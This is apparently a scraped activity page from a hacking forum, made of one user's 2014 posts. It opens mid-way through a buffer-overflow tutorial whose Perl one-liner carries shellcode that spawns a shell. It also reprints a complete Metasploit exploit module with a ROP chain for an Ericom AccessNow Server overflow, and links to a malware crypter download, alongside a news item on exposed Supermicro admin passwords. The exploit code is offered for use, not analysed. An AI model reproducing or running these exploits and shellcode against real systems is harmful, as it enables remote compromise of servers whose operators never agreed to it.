addresses after the colon are the addresses that we are interested in. To view what data they hold, we have to type "x/s 0xbfffd6d0", which will give us: Which is clearly not our shellcode, so this must be the buffer before we have written to it. So, if we type "x/s 0xbfffd974", we should see our shellcode. Hmm.. Well that's odd.. No shellcode. Oh yeah, it's further down, past the Nops. Press enter once and we should see it. That's it! We know where our shellcode is stored, so now we can take the address "0xbfffd974" and substitute it right into the exploit.. right? Nope, we must swap the byte order around due to a "phenomena" known as Little Endian byte order, which causes byte orders to switch around inside addresses. So, we switch around the Bytes to give us "74 d9 ff bf", which then need to have "\x" prepended, as they are hex bytes, which will give us "\x74\xd9\xff\xbf". This can now be substituted into our exploit to give us the Perl code: run perl -e 'print "\x90" x (268 - 26) . "\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x74\xd9\xff\xbf"' Which, when run, should give us a shell (Note that sometimes GDB does not have the permissions required, so you should run it outside GDB, by typing "quit", then replacing "run" with the name of the binary): WE DID IT! From now on, you will have a shell in the specified application (until you choose to quit)! Once you do quit, however, the program will crash, and most likely cause Denial Of Service in programs such as web servers, which are responsible for serving data to clients. I'm not going to cover how to alter the flow of execution so that the program continues to function correctly, as this is meant to be a tutorial explaining the basics of the buffer overflow, how the concept works and is exploited, so, that is the end of my Buffer Overflow Exploitation tutorial, I hope that you learned how to exploit buffer overflows quickly and easily (if not, feel free to pm me with any questions or problems and I'll make sure to get back to you), thanks a lot. Author: xAMNESIAx Source

June 26, 2014
- 2

free SMTPs

Fi8sVrs replied to prussic's topic in Cosul de gunoi

June 26, 2014
22 replies

[eBook] Anti-Hacker Tool Kit, 4th Edition

Fi8sVrs posted a topic in Tutoriale in engleza

ANTI-HACKER TOOL KIT, Fourth Edition Author: Mike Shema Download: http://www.scribd.com/doc/231392575/Anti-Hacker-Tool-Kit-4th-Edition

June 26, 2014

At least 32,000 servers broadcast admin passwords in the clear, advisory warns

Fi8sVrs posted a topic in Stiri securitate

Exploiting bug in Supermicro hardware is as easy as connecting to port 49152. An alarming number of servers containing motherboards manufactured by Supermicro continue to expose administrator passwords despite the release of an update that patches the critical vulnerability, an advisory published Thursday warned. The threat resides in the baseboard management controller (BMC), a motherboard component that allows administrators to monitor the physical status of large fleets of servers, including their temperatures, disk and memory performance, and fan speeds. Unpatched BMCs in Supermicro motherboards contain a binary file that stores remote login passwords in clear text. Vulnerable systems can be detected by performing an Internet scan on port 49152. A recent query on the Shodan search engine indicated there are 31,964 machines still vulnerable, a number that may not include many virtual machines used in shared hosting environments. "This means at the point of this writing, there are 31,964 systems that have their passwords available on the open market," wrote Zachary Wikholm, a senior security engineer with the CARInet Security Incident Response Team. "It gets a bit scarier when you review some of the password statistics. Out of those passwords, 3,296 are the default combination. Since I'm not comfortable providing too much password information, I will just say that there exists a subset of this data that either contains or just was 'password.'" A separate blog post from security training institute Sans confirmed the contents of the advisory. "The vulnerability involves a plaintext password file available for download simply by connecting to the specific port, 49152," it stated. "One of our team has tested this vulnerability, and it works like a champ, so let’s add another log to the fire and spread the good word." Other researchers chimed in with tweets such as: Wikholm said the Supermicro patch requires vulnerable motherboards to be "flashed" with new firmware, a process that's not feasible for many production servers. An alternative workaround involves establishing a secure shell connection to a vulnerable device and disabling all universal plug and play processes. While effective, the fix lasts only until the system is disconnected from a power source, making it possible for the vulnerability to be resurrected. Thursday's advisory comes 10 months after security researchers warned that as many as 100,000 Internet-connected servers sold by Dell, HP, and other large manufacturers contained BMCs that were vulnerable to remote hack attacks that steal passwords and install malware on their host systems. Those vulnerabilities were contained in the intelligent platform management interface, a protocol implemented in various BMCs. Via

June 20, 2014

Ericom AccessNow Server Buffer Overflow

Fi8sVrs posted a topic in Exploituri

Ericom AccessNow Server Buffer Overflow metasploit.com ?temp66 ?2014-06-19 ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Ericom AccessNow Server Buffer Overflow', 'Description' => %q{ This module exploits a stack based buffer overflow in Ericom AccessNow Server. The vulnerability is due to an insecure usage of vsprintf with user controlled data, which can be triggered with a malformed HTTP request. This module has been tested successfully with Ericom AccessNow Server 2.4.0.2 on Windows XP SP3 and Windows 2003 Server SP2. }, 'Author' => [ 'Unknown', # Vulnerability Discovery 'juan vazquez', # Metasploit Module ], 'References' => [ ['ZDI', '14-160'], ['CVE', '2014-3913'], ['BID', '67777'], ['URL','http://www.ericom.com/security-ERM-2014-610.asp'] ], 'Privileged' => true, 'Platform' => 'win', 'Arch' => ARCH_X86, 'Payload' => { 'Space' => 4096, 'BadChars' => "\x00\x0d\x0a", 'DisableNops' => true, 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 }, 'Targets' => [ [ 'Ericom AccessNow Server 2.4.0.2 / Windows [XP SP3 / 2003 SP2]', { 'RopOffset' => 62, 'Offset' => 30668, 'Ret' => 0x104da1e5 # 0x104da1e5 {pivot 1200 / 0x4b0} # ADD ESP,4B0 # RETN # From AccessNowAccelerator32.dll } ] ], 'DisclosureDate' => 'Jun 2 2014', 'DefaultTarget' => 0)) register_options([Opt::RPORT(8080)], self.class) end def check res = send_request_cgi({ 'uri' => '/AccessNow/start.html' }) unless res && res.code == 200 && res.headers['Server'] return Exploit::CheckCode::Safe end if res.headers['Server'] =~ /Ericom AccessNow Server/ return Exploit::CheckCode::Appears # Ericom AccessNow 2.4 elsif res && res.code == 200 && res.headers['Server'] && res.headers['Server'] =~ /Ericom Access Server/ return Exploit::CheckCode::Detected # Ericom AccessNow 3 end Exploit::CheckCode::Unknown end def exploit_uri uri = "#{rand_text_alpha(1)} " # To ensure a "malformed request" error message uri << rand_text(target['RopOffset']) uri << create_rop_chain uri << payload.encoded uri << rand_text(target['Offset'] - uri.length) uri << rand_text(4) # nseh uri << [target.ret].pack("V") # seh uri end def exploit print_status("#{peer} - Sending malformed request...") send_request_raw({ 'method' => 'GET', 'uri' => exploit_uri, 'encode' => false }, 1) end def create_rop_chain # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ 0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure it works in both windows 2003 SP2 and XP SP3 0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure it works in both windows 2003 SP2 and XP SP3 0x10518866, # POP EAX # RETN [AccessNowAccelerator32.dll] 0x105c6294, # ptr to &VirtualAlloc() [IAT AccessNowAccelerator32.dll] 0x101f292b, # MOV EAX,DWORD PTR DS:[EAX] # RETN [AccessNowAccelerator32.dll] 0x101017e6, # XCHG EAX,ESI # RETN [AccessNowAccelerator32.dll] 0x103ba89c, # POP EBP # RETN [AccessNowAccelerator32.dll] 0x103eed74, # & jmp esp [AccessNowAccelerator32.dll] 0x1055dac2, # POP EAX # RETN [AccessNowAccelerator32.dll] 0xffffffff, # Value to negate, will become 0x00000001 0x1052f511, # NEG EAX # RETN [AccessNowAccelerator32.dll] 0x10065f69, # XCHG EAX,EBX # RETN [AccessNowAccelerator32.dll] 0x10074429, # POP EAX # RETN [AccessNowAccelerator32.dll] 0xfbdbcb75, # put delta into eax (-> put 0x00001000 into edx) 0x10541810, # ADD EAX,424448B # RETN [AccessNowAccelerator32.dll] 0x1038e58a, # XCHG EAX,EDX # RETN [AccessNowAccelerator32.dll] 0x1055d604, # POP EAX # RETN [AccessNowAccelerator32.dll] 0xffffffc0, # Value to negate, will become 0x00000040 0x10528db3, # NEG EAX # RETN [AccessNowAccelerator32.dll] 0x1057555d, # XCHG EAX,ECX # RETN [AccessNowAccelerator32.dll] 0x1045fd24, # POP EDI # RETN [AccessNowAccelerator32.dll] 0x10374022, # RETN (ROP NOP) [AccessNowAccelerator32.dll] 0x101f25d4, # POP EAX # RETN [AccessNowAccelerator32.dll] 0x90909090, # nop 0x1052cfce # PUSHAD # RETN [AccessNowAccelerator32.dll] ].pack("V*") rop_gadgets end end Source

June 19, 2014

PDBRipper

Fi8sVrs posted a topic in Programe utile

PDBRipper is a utility for extract a information from PDB-files. PDPRipper can extract: Enumerations User define types(structures, unions ...) Type defines and creates header C/C++ files. Download PDBRipper ver. 1.12 (OS Windows) Source

June 19, 2014

Source Crypter [VB6]

Fi8sVrs posted a topic in Programe hacking

Source Crypter By Kaway [VB6] Download: http://uppit.com/2muxdvh2hlw7/sc.rar pass: estuda

June 19, 2014

[eBook] Learning Nessus for Penetration Testing

Fi8sVrs posted a topic in Tutoriale in engleza

Learning Nessus for Penetration Testing Master how to perform IT infrastructure security vulnerability assessments using Nessus with tips and insights from real-world challenges faced during vulnerability assessment Author: Himanshu Kumar Download: http://www.scribd.com/doc/230390527/Learning-Nessus-for-Penetration-Testing

June 19, 2014
- ebook
- nessus
- (and 1 more)
  Tagged with:

Sign In

Fi8sVrs

Posts

Joined

Days Won

Content Type

Profiles

Forums

Everything posted by Fi8sVrs

Template-uri pentru site la comanda!

pma vuln list

O sursa Bruteforce ? :D

free SMTPs

Redis Portscan Utility

DEScrypt Ztex Bruteforcer

Putin: Crack Tor for me and I'll make you a MILLIONAIRE

Hello world

PyHttpShell

Plesk Sitebuilder XSS / Bypass / Shell Upload / File Download

SILC - Secure Internet Live Conferencing

E2 2844 SQL Injection

Optimizare site

free SMTPs

SMTPTX v1.0 Beta

XSSYA Cross Site Scripting Scanner

SMTP Bruter (Windows)

Buffer Overflow Exploitation for Beginners

free SMTPs

[eBook] Anti-Hacker Tool Kit, 4th Edition

At least 32,000 servers broadcast admin passwords in the clear, advisory warns

Ericom AccessNow Server Buffer Overflow

PDBRipper

Source Crypter [VB6]

[eBook] Learning Nessus for Penetration Testing

Browse

Activity

Pages